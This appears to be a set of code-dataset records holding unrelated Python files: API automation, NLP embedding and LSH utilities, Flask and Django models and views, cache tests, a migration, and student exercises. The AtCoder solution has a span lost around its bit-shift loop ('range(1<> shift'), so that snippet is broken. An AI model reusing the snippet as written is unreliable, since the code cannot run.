revision_url = f\"/api/blueprints/{bp_id}/revisions\"\n revision_data = json.loads(self.http_get(revision_url,expected=200).data)\n revision_id = int(revision_data[\"items\"][-1][\"revision_id\"]) + 10\n\n # TODO: fix. currently needs GUI to commit\n commit_url = f\"/api/blueprints/{bp_id}/deploy?async=full\"\n commit_data = {\n \"version\": revision_id,\n \"description\": description\n }\n resp = self.http_put(commit_url, commit_data, expected=202)\n return resp\n\n\n\ndef main():\n with open(r'inventory-python.yaml') as file:\n AOS_ENV = yaml.load(file, Loader=yaml.FullLoader)\n\n bp_id = AOS_ENV[\"blueprints\"][0][\"id\"]\n\n aos_server = AosServer(AOS_ENV[\"aos_server\"][\"host\"], AOS_ENV[\"aos_server\"][\"port\"], AOS_ENV[\"aos_server\"][\"username\"], AOS_ENV[\"aos_server\"][\"password\"])\n\n # deprecated\n if len(sys.argv) >1 and sys.argv[1] == \"delete\":\n pass\n # print( \"deleting\")\n # aos_server.virtual_networks_delete(bp_id, \"c-801\")\n # aos_server.routing_zone_delete(bp_id, \"lab2\")\n # # aos_server.context_template_delete(bp_id, \"test1234\")\n\n else:\n print( \"creating\")\n # aos_server.create_IP_Pool(AOS_ENV[\"resources\"][\"ip_pools\"])\n aos_server.routing_zone_add(bp_id, AOS_ENV[\"blueprints\"][0][\"routing_zones\"][0])\n aos_server.virtual_networks_add(bp_id, AOS_ENV[\"blueprints\"][0][\"routing_zones\"][0][\"virtual_networks\"], AOS_ENV[\"blueprints\"][0][\"routing_zones\"][0][\"label\"], AOS_ENV[\"blueprints\"][0][\"systems\"])\n # TODO: implement async\n # time.sleep(10)\n aos_server.commit(bp_id)\n\nif __name__ == \"__main__\":\n main()\n\n\n\n\n\n\n\n","repo_name":"kimcharli/apstra-api","sub_path":"python/aos_python.py","file_name":"aos_python.py","file_ext":"py","file_size_in_byte":15183,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"19970383232","text":"# -*- coding: utf-8 -*-\nimport re\nimport string\n\nimport numpy as np\nimport pandas as pd\nfrom nltk.corpus import stopwords\nfrom nltk.stem import PorterStemmer\nfrom nltk.tokenize import TweetTokenizer\n\n\ndef process_tweet(tweet):\n '''\n Input:\n tweet: a string containing a tweet\n Output:\n tweets_clean: a list of words containing the processed tweet\n\n '''\n stemmer = PorterStemmer()\n stopwords_english = stopwords.words('english')\n # remove stock market tickers like $GE\n tweet = re.sub(r'\\$\\w*', '', tweet)\n # remove old style retweet text \"RT\"\n tweet = re.sub(r'^RT[\\s]+', '', tweet)\n # remove hyperlinks\n tweet = re.sub(r'https?:\\/\\/.*[\\r\\n]*', '', tweet)\n # remove hashtags\n # only removing the hash # sign from the word\n tweet = re.sub(r'#', '', tweet)\n # tokenize tweets\n tokenizer = TweetTokenizer(preserve_case=False, strip_handles=True,\n reduce_len=True)\n tweet_tokens = tokenizer.tokenize(tweet)\n\n tweets_clean = []\n for word in tweet_tokens:\n if (word not in stopwords_english and # remove stopwords\n word not in string.punctuation): # remove punctuation\n # tweets_clean.append(word)\n stem_word = stemmer.stem(word) # stemming word\n tweets_clean.append(stem_word)\n\n return tweets_clean\n\n\ndef get_dict(file_name):\n \"\"\"\n This function returns the english to french dictionary given a file where the each column corresponds to a word.\n Check out the files this function takes in your workspace.\n \"\"\"\n my_file = pd.read_csv(file_name, delimiter=' ')\n etof = {} # the english to french dictionary to be returned\n for i in range(len(my_file)):\n # indexing into the rows.\n en = my_file.loc[i][0]\n fr = my_file.loc[i][1]\n etof[en] = fr\n\n return etof\n\n\ndef cosine_similarity(A, B):\n '''\n Input:\n A: a numpy array which corresponds to a word vector\n B: A numpy array which corresponds to a word vector\n Output:\n cos: numerical number representing the cosine similarity between A and B.\n '''\n # you have to set this variable to the true label.\n cos = -10 \n dot = np.dot(A, B)\n normb = np.linalg.norm(B)\n \n if len(A.shape) == 1: # If A is just a vector, we get the norm\n norma = np.linalg.norm(A)\n cos = dot / (norma * normb)\n else: # If A is a matrix, then compute the norms of the word vectors of the matrix (norm of each row)\n norma = np.linalg.norm(A, axis=1)\n epsilon = 1.0e-9 # to avoid division by 0\n cos = dot / (norma * normb + epsilon)\n \n return cos\n\n\ndef get_matrices(en_fr, french_vecs, english_vecs):\n \"\"\"convert dictionary of words to matrix of embeddings\n Input:\n en_fr: English to French dictionary\n french_vecs: French words to their corresponding word embeddings.\n english_vecs: English words to their corresponding word embeddings.\n Output: \n X: a matrix where the columns are the English embeddings.\n Y: a matrix where the columns correspong to the French embeddings.\n R: the projection matrix that minimizes the F norm ||X R -Y||^2.\n \"\"\"\n\n # X_l and Y_l are lists of the english and french word embeddings\n X_l = list()\n Y_l = list()\n\n # get the english words (the keys in the dictionary) and store in a set()\n english_set = set(english_vecs.keys())\n\n # get the french words (keys in the dictionary) and store in a set()\n french_set = set(french_vecs.keys())\n\n # store the french words that are part of the english-french dictionary (these are the values of the dictionary)\n french_words = set(en_fr.values())\n\n # loop through all english, french word pairs in the english french dictionary\n for en_word, fr_word in en_fr.items():\n\n # check that the french word has an embedding and that the english word has an embedding\n if fr_word in french_set and en_word in english_set:\n\n # get the english embedding\n en_vec = english_vecs[en_word]\n\n # get the french embedding\n fr_vec = french_vecs[fr_word]\n\n # add the english embedding to the list\n X_l.append(en_vec)\n\n # add the french embedding to the list\n Y_l.append(fr_vec)\n\n # stack the vectors of X_l into a matrix X\n X = np.array(X_l)\n\n # stack the vectors of Y_l into a matrix Y\n Y = np.array(Y_l)\n\n return X, Y\n\n\ndef compute_loss(X, Y, R):\n ''' computes frobenius on (XR - Y)\n Inputs: \n X: a matrix of dimension (m,n) where the columns are the English embeddings.\n Y: a matrix of dimension (m,n) where the columns correspong to the French embeddings.\n R: a matrix of dimension (n,n) - transformation matrix from English to French vector space embeddings.\n Outputs:\n L: a matrix of dimension (m,n) - the value of the loss function for given X, Y and R.\n '''\n # m is the number of rows in X\n m = X.shape[0]\n \n # diff is XR - Y \n diff = X @ R - Y\n\n # diff_squared is the element-wise square of the difference \n diff_squared = diff ** 2\n\n # sum_diff_squared is the sum of the squared elements\n sum_diff_squared = np.sum(diff_squared)\n\n # loss i is the sum_diff_squard divided by the number of examples (m)\n loss = sum_diff_squared/m\n ### END CODE HERE ###\n return loss\n\ndef compute_gradient(X, Y, R):\n ''' computes gradient for the loss X(XR-Y)*2/m\n Inputs: \n X: a matrix of dimension (m,n) where the columns are the English embeddings.\n Y: a matrix of dimension (m,n) where the columns correspong to the French embeddings.\n R: a matrix of dimension (n,n) - transformation matrix from English to French vector space embeddings.\n Outputs:\n g: a scalar value - gradient of the loss function L for given X, Y and R.\n '''\n # m is the number of rows in X\n m = X.shape[0]\n\n # gradient is X^T(XR - Y) * 2/m \n gradient = X.T @ (X@R - Y) * 2/m\n \n return gradient\n\ndef align_embeddings(X, Y, train_steps=100, learning_rate=0.0003, verbose=True, compute_loss=compute_loss, compute_gradient=compute_gradient):\n '''finetunes R vector\n Inputs:\n X: a matrix of dimension (m,n) where the columns are the English embeddings.\n Y: a matrix of dimension (m,n) where the columns correspong to the French embeddings.\n train_steps: positive int - describes how many steps will gradient descent algorithm do.\n learning_rate: positive float - describes how big steps will gradient descent algorithm do.\n Outputs:\n R: a matrix of dimension (n,n) - the projection matrix that minimizes the F norm ||X R -Y||^2\n '''\n np.random.seed(129)\n\n # the number of columns in X is the number of dimensions for a word vector (e.g. 300)\n # R is a square matrix with length equal to the number of dimensions in th word embedding\n R = np.random.rand(X.shape[1], X.shape[1])\n\n for i in range(train_steps):\n if verbose and i % 25 == 0:\n print(f\"loss at iteration {i} is: {compute_loss(X, Y, R):.4f}\")\n # use the function that you defined to compute the gradient\n gradient = compute_gradient(X, Y, R)\n\n # update R by subtracting the learning rate times gradient\n R -= learning_rate * gradient\n return R\n\n\ndef nearest_neighbor(v, candidates, k=1, cosine_similarity=cosine_similarity):\n \"\"\"\n Input:\n - v, the vector you are going find the nearest neighbor for\n - candidates: a set of vectors where we will find the neighbors\n - k: top k nearest neighbors to find\n Output:\n - k_idx: the indices of the top k closest vectors in sorted form\n \"\"\"\n similarity_l = []\n\n # for each candidate vector...\n for row in candidates:\n # get the cosine similarity\n cos_similarity = cosine_similarity(v, row)\n\n # append the similarity to the list\n similarity_l.append(cos_similarity)\n\n # sort the similarity list and get the indices of the sorted list \n sorted_ids = np.argsort(similarity_l) \n \n # Reverse the order of the sorted_ids array\n sorted_ids = sorted_ids[::-1]\n \n # get the indices of the k most similar candidate vectors\n k_idx = sorted_ids[:k]\n return k_idx\n\n\ndef test_vocabulary(X, Y, R, nearest_neighbor=nearest_neighbor):\n '''\n Input:\n X: a matrix where the columns are the English embeddings.\n Y: a matrix where the columns correspong to the French embeddings.\n R: the transform matrix which translates word embeddings from\n English to French word vector space.\n Output:\n accuracy: for the English to French capitals\n '''\n\n # The prediction is X times R\n pred = X @ R\n\n # initialize the number correct to zero\n num_correct = 0\n\n # loop through each row in pred (each transformed embedding)\n for i in range(len(pred)):\n # get the index of the nearest neighbor of pred at row 'i'; also pass in the candidates in Y\n pred_idx = nearest_neighbor(pred[i], Y, k=1)\n\n # if the index of the nearest neighbor equals the row of i... \\\n if pred_idx == i:\n # increment the number correct by 1.\n num_correct += 1\n\n # accuracy is the number correct divided by the number of rows in 'pred' (also number of rows in X)\n accuracy = num_correct/pred.shape[0]\n\n return accuracy\n\ndef get_document_embedding(tweet, en_embeddings, process_tweet=process_tweet):\n '''sum embeddings of all words in a given tweet\n Input:\n - tweet: a string\n - en_embeddings: a dictionary of word embeddings\n Output:\n - doc_embedding: sum of all word embeddings in the tweet\n '''\n doc_embedding = np.zeros(300)\n\n # process the document into a list of words (process the tweet)\n processed_doc = process_tweet(tweet)\n for word in processed_doc:\n # add the word embedding to the running total for the document embedding\n if word in en_embeddings.keys():\n doc_embedding += en_embeddings[word]\n return doc_embedding\n\ndef get_document_vecs(all_docs, en_embeddings, get_document_embedding=get_document_embedding):\n '''\n Input:\n - all_docs: list of strings - all tweets in our dataset.\n - en_embeddings: dictionary with words as the keys and their embeddings as the values.\n Output:\n - document_vec_matrix: matrix of tweet embeddings.\n - ind2Doc_dict: dictionary with indices of tweets in vecs as keys and their embeddings as the values.\n '''\n\n # the dictionary's key is an index (integer) that identifies a specific tweet\n # the value is the document embedding for that document\n ind2Doc_dict = {}\n\n # this is list that will store the document vectors\n document_vec_l = []\n\n for i, doc in enumerate(all_docs):\n\n # get the document embedding of the tweet\n doc_embedding = get_document_embedding(doc, en_embeddings)\n\n # save the document embedding into the ind2Tweet dictionary at index i\n ind2Doc_dict[i] = doc_embedding\n\n # append the document embedding to the list of document vectors\n document_vec_l.append(doc_embedding)\n\n # convert the list of document vectors into a 2D array (each row is a document vector)\n document_vec_matrix = np.vstack(document_vec_l)\n\n return document_vec_matrix, ind2Doc_dict\n\ndef hash_value_of_vector(v, planes):\n \"\"\"Create a hash for a vector; hash_id says which random hash to use.\n Input:\n - v: vector of tweet. It's dimension is (1, N_DIMS)\n - planes: matrix of dimension (N_DIMS, N_PLANES) - the set of planes that divide up the region\n Output:\n - res: a number which is used as a hash for your vector\n\n \"\"\"\n # for the set of planes,\n # calculate the dot product between the vector and the matrix containing the planes\n # remember that planes has shape (300, 10)\n # The dot product will have the shape (1,10) \n dot_product = v @ planes\n \n # get the sign of the dot product (1,10) shaped vector\n sign_of_dot_product = np.sign(dot_product)\n\n # set h to be false (eqivalent to 0 when used in operations) if the sign is negative,\n # and true (equivalent to 1) if the sign is positive (1,10) shaped vector\n # if the sign is 0, i.e. the vector is in the plane, consider the sign to be positive\n h = sign_of_dot_product >= 0\n\n # remove extra un-used dimensions (convert this from a 2D to a 1D array)\n h = np.squeeze(h)\n\n # initialize the hash value to 0\n hash_value = 0\n\n n_planes = planes.shape[1]\n for i in range(n_planes):\n # increment the hash value by 2^i * h_i \n hash_value += 2 ** i * h[i]\n \n # cast hash_value as an integer\n hash_value = int(hash_value)\n\n return hash_value\n\ndef make_hash_table(vecs, planes, hash_value_of_vector=hash_value_of_vector):\n \"\"\"\n Input:\n - vecs: list of vectors to be hashed.\n - planes: the matrix of planes in a single \"universe\", with shape (embedding dimensions, number of planes).\n Output:\n - hash_table: dictionary - keys are hashes, values are lists of vectors (hash buckets)\n - id_table: dictionary - keys are hashes, values are list of vectors id's\n (it's used to know which tweet corresponds to the hashed vector)\n \"\"\"\n\n # number of planes is the number of columns in the planes matrix\n num_of_planes = planes.shape[1]\n\n # number of buckets is 2^(number of planes) \n num_buckets = 2 ** num_of_planes\n\n # create the hash table as a dictionary.\n # Keys are integers (0,1,2.. number of buckets)\n # Values are empty lists\n hash_table = {i:[] for i in range(num_buckets)}\n\n # create the id table as a dictionary.\n # Keys are integers (0,1,2... number of buckets)\n # Values are empty lists\n id_table = {i:[] for i in range(num_buckets)}\n\n # for each vector in 'vecs'\n for i, v in enumerate(vecs):\n # calculate the hash value for the vector\n h = hash_value_of_vector(v, planes)\n\n # store the vector into hash_table at key h,\n # by appending the vector v to the list at key h\n hash_table[h].append(v)\n\n # store the vector's index 'i' (each document is given a unique integer 0,1,2...)\n # the key is the h, and the 'i' is appended to the list at key h\n id_table[h].append(i)\n\n\n return hash_table, id_table\n\n\ndef create_hash_id_tables(n_universes, planes_l, document_vecs):\n ''' Creating the hashtables'''\n hash_tables = []\n id_tables = []\n for universe_id in range(n_universes): # there are 25 hashes\n print('working on hash universe #:', universe_id)\n planes = planes_l[universe_id]\n hash_table, id_table = make_hash_table(document_vecs, planes)\n hash_tables.append(hash_table)\n id_tables.append(id_table)\n \n return hash_tables, id_tables\n\n\n\ndef approximate_knn(doc_id, v, planes_l, hash_tables, id_tables, k=1, num_universes_to_use=25, hash_value_of_vector=hash_value_of_vector):\n \"\"\"Search for k-NN using hashes.\"\"\"\n #assert num_universes_to_use <= N_UNIVERSES\n\n # Vectors that will be checked as possible nearest neighbor\n vecs_to_consider_l = list()\n\n # list of document IDs\n ids_to_consider_l = list()\n\n # create a set for ids to consider, for faster checking if a document ID already exists in the set\n ids_to_consider_set = set()\n\n # loop through the universes of planes\n for universe_id in range(num_universes_to_use):\n\n # get the set of planes from the planes_l list, for this particular universe_id\n planes = planes_l[universe_id]\n\n # get the hash value of the vector for this set of planes\n hash_value = hash_value_of_vector(v, planes)\n\n # get the hash table for this particular universe_id\n hash_table = hash_tables[universe_id]\n\n # get the list of document vectors for this hash table, where the key is the hash_value\n document_vectors_l = hash_table[hash_value]\n\n # get the id_table for this particular universe_id\n id_table = id_tables[universe_id]\n\n # get the subset of documents to consider as nearest neighbors from this id_table dictionary\n new_ids_to_consider = id_table[hash_value]\n\n\n # loop through the subset of document vectors to consider\n for i, new_id in enumerate(new_ids_to_consider):\n \n if doc_id == new_id:\n continue\n\n # if the document ID is not yet in the set ids_to_consider...\n if new_id not in ids_to_consider_set:\n # access document_vectors_l list at index i to get the embedding\n # then append it to the list of vectors to consider as possible nearest neighbors\n document_vector_at_i = document_vectors_l[i]\n vecs_to_consider_l.append(document_vector_at_i)\n\n # append the new_id (the index for the document) to the list of ids to consider\n ids_to_consider_l.append(new_id)\n\n # also add the new_id to the set of ids to consider\n # (use this to check if new_id is not already in the IDs to consider)\n ids_to_consider_set.add(new_id)\n\n\n # Now run k-NN on the smaller set of vecs-to-consider.\n print(\"Fast considering %d vecs\" % len(vecs_to_consider_l))\n\n # convert the vecs to consider set to a list, then to a numpy array\n vecs_to_consider_arr = np.array(vecs_to_consider_l)\n\n # call nearest neighbors on the reduced list of candidate vectors\n nearest_neighbor_idx_l = nearest_neighbor(v, vecs_to_consider_arr, k=k)\n\n # Use the nearest neighbor index list as indices into the ids to consider\n # create a list of nearest neighbors by the document ids\n nearest_neighbor_ids = [ids_to_consider_l[idx]\n for idx in nearest_neighbor_idx_l]\n\n return nearest_neighbor_ids","repo_name":"mz-zarei/nlp_specialization","sub_path":"1_Classification_VectorSpaces/doc_search_LSH_KNN/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":18056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"40264391519","text":"#!/usr/bin/env python3\n\nn = int(input())\nA = list(map(int, input().split()))\nans = 10**10\nfor i in range(1<> shift & 1 == 1: # 入れる\n anstemp = temp if anstemp == 0 else anstemp^temp\n temp = A[shift+1]\n else: # 入れない\n temp = temp | A[shift+1]\n anstemp = anstemp^temp\n ans = min(ans, anstemp)\nprint(ans)","repo_name":"skyeanka/atcoder","sub_path":"abc197/c/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"73538892902","text":"from datetime import datetime\nfrom pytz import timezone\nimport MySQLdb\n\nfrom app import db\n\nclass Product(db.Model):\n \"\"\"product model definition\"\"\"\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(50), unique=True)\n qtty = db.Column(db.Integer, default=0)\n reoder_level = db.Column(db.Integer, default=5)\n orders = db.relationship('Order', backref='product', lazy=True)\n reorders = db.relationship('ReOrder', backref='product', lazy=True)\n created_at = db.Column(db.DateTime, default=datetime.now(tz=timezone('Africa/Nairobi')))\n updated_at = db.Column(db.DateTime, default=datetime.now(tz=timezone('Africa/Nairobi')))\n\n\n @property\n def serializer(self):\n return {\n 'id': self.id,\n 'name': self.name,\n 'qtty': self.qtty,\n 'reorder_level': self.reoder_level,\n 'orders': [\n order.serializer\n for order in self.orders\n ],\n 'rorders': [\n reorder.serializer\n for reorder in self.reorders\n ],\n 'created_at': self.created_at,\n 'updated_at': self.updated_at,\n }\n\n \n def add(self, data):\n \"\"\"add product record to the db\"\"\"\n try:\n product = Product(**data)\n\n db.session.add(product)\n try:\n db.session.commit()\n except MySQLdb.IntegrityError as e:\n # log exception\n print(str(e))\n return None \n\n # refresh the inserted object and get id\n db.session.refresh(product)\n if not product.id:\n return None\n\n return product.id\n except MySQLdb.IntegrityError as e:\n # log exception\n print(str(e))\n return None \n\n def get_one(self, id):\n \"\"\"retrieve product from db by id\"\"\"\n product = Product.query.filter_by(id=id).first()\n if not product:\n return None\n \n return product.serializer\n \n def get_all(self):\n \"\"\"retieve all products from the db\"\"\"\n products = Product.query.all()\n\n if not products:\n return None\n\n return [\n product.serializer\n for product in products\n ]\n\n def update_product(self, id, data):\n \"\"\"update product record in db by id\"\"\"\n product = Product.query.filter_by(id=id).update(data)\n if not product:\n return None\n db.session.commit()\n\n return product\n\n def delete_product(self, id):\n \"\"\"delete product from the db by id\"\"\"\n product = Product.query.filter_by(id=id).first()\n\n if not product:\n return None\n db.session.delete(product)\n db.session.commit()\n product = Product.query.filter_by(id=id).first()\n\n if product:\n return None\n\n return True","repo_name":"Hillary-KG/kefis","sub_path":"api/app/products/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"22951992710","text":"import json, pytest\nfrom movies.cache import Cache\nfrom movies.constants import DEFAULT_CACHE_MINUTES, MINUTE_IN_SECONDS\n\n\nclass TestCache:\n\n @pytest.fixture\n def cache_instances(self):\n instances = []\n for _ in range(10):\n instance = Cache()\n instances.append(instance)\n return instances\n\n @pytest.fixture\n def key_value(self):\n data = {\n \"name\": \"Web Developer career\",\n \"start\": 2017,\n \"status\": \"in progress\",\n \"company\": \"Magalu\"\n }\n return {\n 'key': 'test_data',\n 'value': json.dumps(data)\n }\n\n @pytest.fixture\n def custom_key_value(self, key_value):\n custom_k_v = key_value.copy()\n custom_k_v['key'] = 'custom_test_data'\n return custom_k_v\n\n @pytest.fixture\n def cache_time(self):\n return MINUTE_IN_SECONDS\n\n @pytest.fixture\n def set_key_value_on_cache(self, cache_instances, key_value):\n cache_instances[0].set_value(\n key_value['key'], key_value['value']\n )\n\n @pytest.fixture\n def set_value_with_specific_expire_time(\n self,\n cache_instances,\n cache_time,\n custom_key_value\n ):\n cache_instances[1].set_value(\n custom_key_value['key'],\n custom_key_value['value'],\n cache_time\n )\n\n def test_cache_instances_share_same_redis_client(self, cache_instances):\n for i in range(1, len(cache_instances)):\n assert cache_instances[i].client == cache_instances[i - 1].client\n\n def test_get_value_on_cache(\n self,\n cache_instances,\n set_key_value_on_cache,\n key_value\n ):\n cached_data = (cache_instances[1].get_value(key_value['key'])).decode('utf-8')\n assert cached_data == key_value['value']\n\n def test_get_default_expire_time(\n self,\n cache_instances,\n set_key_value_on_cache,\n key_value\n ):\n expire_time = cache_instances[0].get_expire_time(key_value['key'])\n assert expire_time == DEFAULT_CACHE_MINUTES * MINUTE_IN_SECONDS\n\n def test_get_custom_expire_time(\n self,\n cache_instances,\n cache_time,\n custom_key_value,\n set_value_with_specific_expire_time\n ):\n expire_time = cache_instances[2].get_expire_time(custom_key_value['key'])\n assert expire_time == cache_time\n","repo_name":"marcelo-vp/movies","sub_path":"movies/cache/tests/test_cache.py","file_name":"test_cache.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"20947402024","text":"\"\"\"your message\n\nRevision ID: 6813d72b29fb\nRevises: a99f1b59bd3e\nCreate Date: 2022-04-07 17:29:50.011377\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nimport sqlmodel\n\n\n# revision identifiers, used by Alembic.\nrevision = '6813d72b29fb'\ndown_revision = 'a99f1b59bd3e'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('hero', sa.Column('headquarter', sqlmodel.sql.sqltypes.AutoString(), nullable=True))\n op.alter_column('hero', 'age',\n existing_type=sa.INTEGER(),\n nullable=True)\n op.alter_column('hero', 'id',\n existing_type=sa.INTEGER(),\n nullable=True,\n autoincrement=True)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.alter_column('hero', 'id',\n existing_type=sa.INTEGER(),\n nullable=False,\n autoincrement=True)\n op.alter_column('hero', 'age',\n existing_type=sa.INTEGER(),\n nullable=False)\n op.drop_column('hero', 'headquarter')\n # ### end Alembic commands ###\n","repo_name":"ngaller/fastapi_alembic_xp","sub_path":"alembic/versions/6813d72b29fb_your_message.py","file_name":"6813d72b29fb_your_message.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"35551866600","text":"# Bots properties\nBOTS_COUNT = 64\nBOTS_CLONES = 7\nMIN_BOTS = 8\nENERGY = 70\nMAX_ENERGY = 150\n\n# Genes properties\nHIGHEST_GENE = 63\nMAX_GENES_COUNT = 64\nMAX_MUTATION_GENES = 6\n\n# World properties\nWORLD_WIDTH = 66\nWORLD_HEIGHT = 33\n\n# max values properties\nMAX_FOOD = 250\nMAX_POISON = 100\nMIN_FOOD = 50\nMIN_POISON = 60\n\n# Window properties\nMAX_X = 1780\nMAX_Y = 889\nMARGIN = 2\nDEFAULT_SIZE = 25\n","repo_name":"yurii-piets/genom-mutation","sub_path":"src/const/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"110804560","text":"#!/usr/bin/env python3\n\n# --------------------------------\n# 06/29/19 Jinee Han\n# Python Programming Lesson 3\n# List Lab\n# ---------------------------------\n\n# Series 1\n'''\nCreate a list that contains “Apples”, “Pears”, “Oranges” and “Peaches”.\nDisplay the list (plain old print() is fine…).\nAsk the user for another fruit and add it to the end of the list.\nDisplay the list.\nAsk the user for a number and display the number back to the user and the fruit corresponding to that number (on a 1-is-first basis).\nRemember that Python uses zero-based indexing, so you will need to correct.\nAdd another fruit to the beginning of the list using “+” and display the list.\nAdd another fruit to the beginning of the list using insert() and display the list.\nDisplay all the fruits that begin with “P”, using a for loop.\n'''\n\nprint (\"Testing series 1.\\n\")\nfruit_list = [\"Apples\",\"Pears\",\"Oranges\",\"Peaches\"] # Create a list\nprint (fruit_list,'\\n') # Print the list\n\nask_user = input (\"Would you like to add a fruit? (y/n)\") # Ask the user\nif ask_user == \"y\": # Add the fruit to the list\n add_fruit = input (\"Which fruit would you like to add\\n?\")\n fruit_list.append(add_fruit)\n print (fruit_list) # Display the appended list\nelse:\n print (\"\\nNo item was added.\\n\")\n\nfruit_list = [\"Apples\",\"Pears\",\"Oranges\",\"Peaches\"]\nask_numeber = input(\"Enter the number to see the fruit from the list\\n\") #Ask user for a number to display\ndisplay_fruit = print(fruit_list[int(ask_numeber)-1]) # Display the fruit\n\nadd_another_fruit_with_plus = input(\"Let's add another fruit. Please type in.\\n \") # Add another fruit.\nfruit_list = [add_another_fruit_with_plus] + fruit_list# Adding by using '+'\nprint (fruit_list)\n\nadd_another_fruit_with_insert = input(\"Final addition. What is the fruit name?\\n\") # Add another fruit.\nfruit_list. insert(0,add_another_fruit_with_insert) # Adding by using Insert\nprint (\"Here is the final fruit list.\")\nprint (fruit_list)\n\n\n# Display all the fruits that begins with 'P'\n\nprint (\"\\nLet's find out fruits start with P\\n\")\nfor items in fruit_list:\n if items.startswith('P'):\n print(items)\n else:\n continue\n\n# 2. Series 2\n'''\nDisplay the list.\nRemove the last fruit from the list.\nDisplay the list.\nAsk the user for a fruit to delete, find it and delete it.\n(Bonus: Multiply the list times two. Keep asking until a match is found. Once found, delete all occurrences.)\n'''\n\nprint (\"\\nTesting Series 2\\n\")\nprint (fruit_list) # Display the list\nprint (\"\\nRemoving the last item\\n\")\nfruit_list.pop() # Remove the last fruit from the list\nprint (fruit_list) # Display the list\nprint(\"\\nHere is the list to delete from\\n\")\nfruit_list_2 = fruit_list * 2 #Multiply the list times two to delete all occurrences\nprint (fruit_list_2)\nask_what_to_delete = input(\"\\nWhich fruit would you want to delete?\") # Ask the user what to delete\nfor item in fruit_list_2:\n print(\"I am looking for the match.\") # Keep asking until a match is found.\n if ask_what_to_delete == item:\n fruit_list_2.remove(item)\n else:\n continue\nprint (fruit_list_2)\n\n# 3. Series 3\n'''\nAsk the user for input displaying a line like “Do you like apples?” for each fruit in the list (making the fruit all lowercase).\nFor each “no”, delete that fruit from the list.\nFor any answer that is not “yes” or “no”, prompt the user to answer with one of those two values (a while loop is good here)\nDisplay the list.\n'''\n\nprint (\"\\nTesting Series 3.\\n\")\nfruit_list = [\"Apples\",\"Pears\",\"Oranges\",\"Peaches\"]\nremoving_list = []\nfor item in fruit_list:\n do_you_like_fruit = input(\"Do you like {}? (y/n)\".format(item.lower()))\n if do_you_like_fruit == 'n':\n removing_list.append(item)\n else:\n continue\nfinal_list = list(set(fruit_list)-set(removing_list))\n\nprint(\"You want to remove these items: \", removing_list)\nprint(\"You deleted fruits you don't like. Here is the left list:\\n \", final_list)\n\n# 4. Series 4\n'''\nMake a new list with the contents of the original, but with all the letters in each item reversed.\nDelete the last item of the original list. Display the original list and the copy.\n'''\nprint (\"\\nTesting series 4.\\n\")\nfruit_list = [\"Apples\",\"Pears\",\"Oranges\",\"Peaches\"]\nnew_list = [] # create a new list for a reversed fruit list\nfor item in fruit_list: # Reverse the fruit name\n item = item[::-1]\n new_list.append(item)\nprint (\"Reversed item list: \", new_list)\n\n\ncopy_list = fruit_list.copy()\n\nfruit_list.pop() # Delete the last item of the original list\nprint (\"Original list, which the last item deleted: \", fruit_list) # Display the original list\nprint(\"Copy list: \",copy_list) # Display a copy list","repo_name":"UWPCE-PythonCert-ClassRepos/SP_Online_PY210","sub_path":"students/jinee_han/lesson03/List_Lab.py","file_name":"List_Lab.py","file_ext":"py","file_size_in_byte":4688,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"35"} +{"seq_id":"11249499981","text":"from django.shortcuts import render, HttpResponse, redirect\n\nfrom .models import Author, Book\n\n# Create your views here.\ndef index(request):\n context = {\n 'all_authors' : Author.objects.all(),\n 'all_books' : Book.objects.all()\n }\n return render(request, \"index.html\", context)\n\ndef addingBook(request):\n Book.objects.create(\n title = request.POST['titleLabel'],\n desc = request.POST['descLabel']\n )\n\n return redirect('/')\n\ndef bookView(request, id):\n context = {\n 'this_book': Book.objects.get(id=id),\n 'all_authors': Author.objects.all()\n }\n\n return render(request, \"book_info.html\", context)\n\n\ndef authorToBook(request, id2):\n selected_book = Book.objects.get(id=id2) \n selected_author = Author.objects.get(id=request.POST['authorSelect']) \n \n selected_book.authors.add(selected_author)\n\n\n return redirect(request.META.get('HTTP_REFERER'))\n\n\ndef addAuthor(request):\n context = {\n 'all_authors': Author.objects.all(),\n 'all_books': Book.objects.all()\n }\n return render(request, \"authors.html\", context)\n\ndef realAddAuthor(request):\n Author.objects.create(\n first_name = request.POST['firstNameLabel'],\n last_name = request.POST['lastNameLabel'],\n notes = request.POST['notesLabel']\n )\n\n return redirect(request.META.get('HTTP_REFERER'))\n\ndef showAuthor(request, id3):\n context = {\n 'this_author': Author.objects.get(id=id3),\n 'all_books': Book.objects.all()\n }\n return render(request, \"author_info.html\", context)\n\n\ndef bookToAuthor(request, id4):\n selected_author = Author.objects.get(id=id4) \n selected_book = Book.objects.get(id=request.POST['bookSelect']) \n \n selected_book.authors.add(selected_author)\n\n\n return redirect(request.META.get('HTTP_REFERER'))","repo_name":"emad998/python","sub_path":"django/django_orm/books_authors/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"31368120361","text":"import math\nfrom typing import Any, Dict, List, Optional\n\nfrom tools.logger import Logger\nfrom tools.sql import DatabaseType, QueryParams, SQLConnect\n\n\nclass SQLPaginator:\n def 